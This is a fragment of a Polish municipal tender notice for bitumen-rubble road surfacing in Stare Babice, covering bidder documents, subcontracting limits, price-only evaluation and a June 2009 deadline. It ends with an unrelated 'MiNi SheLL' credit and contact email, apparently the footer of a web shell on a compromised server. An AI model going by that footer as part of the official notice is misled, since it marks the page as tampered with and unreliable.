Uwaga: Zał. 5, 6, 7 muszą zostać wystawione w terminach zgodnych z Rozporządzeniem Rady Ministrów z dnia z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy. Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605

W przypadku gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa zamiast dokumentów określonych wyżej jako zał. 5, 6, 7 składa dokumenty przewidziane w § 2 Rozporządzenia Rady Ministrów z dnia z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy. Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605
				
				
W przypadku gdy Oferent przewiduje zlecenie części prac podwykonawcy, to również Podwykonawca musi potwierdzić swoją wiarygodność, doświadczenie oraz zdolność do realizacji zleconej części zamówienia załączając w/w dokumenty. Przy czym Oferent musi własnymi siłami wykonać zakres robót obejmujący co najmniej wykonanie nawierzchni z destruktu bitumicznego, natomiast zakres robót obejmujący powierzchniowe utrwalenie nawierzchni z destruktu bitumicznego może zostać zlecony do wykonania Podwykonawcy.

Uwaga: Informacje powyższe muszą być udzielone w formie pisemnej. Wypełnione formularze, dokumenty i oświadczenia stanowią załącznik do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.babice-stare.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stare Babice
ul. Rynek 32
05-082 Stare Babice
pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 12:00, miejsce: Urząd Gminy Stare Babice
ul. Rynek 32
05-082 Stare Babice
pokój nr 18 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com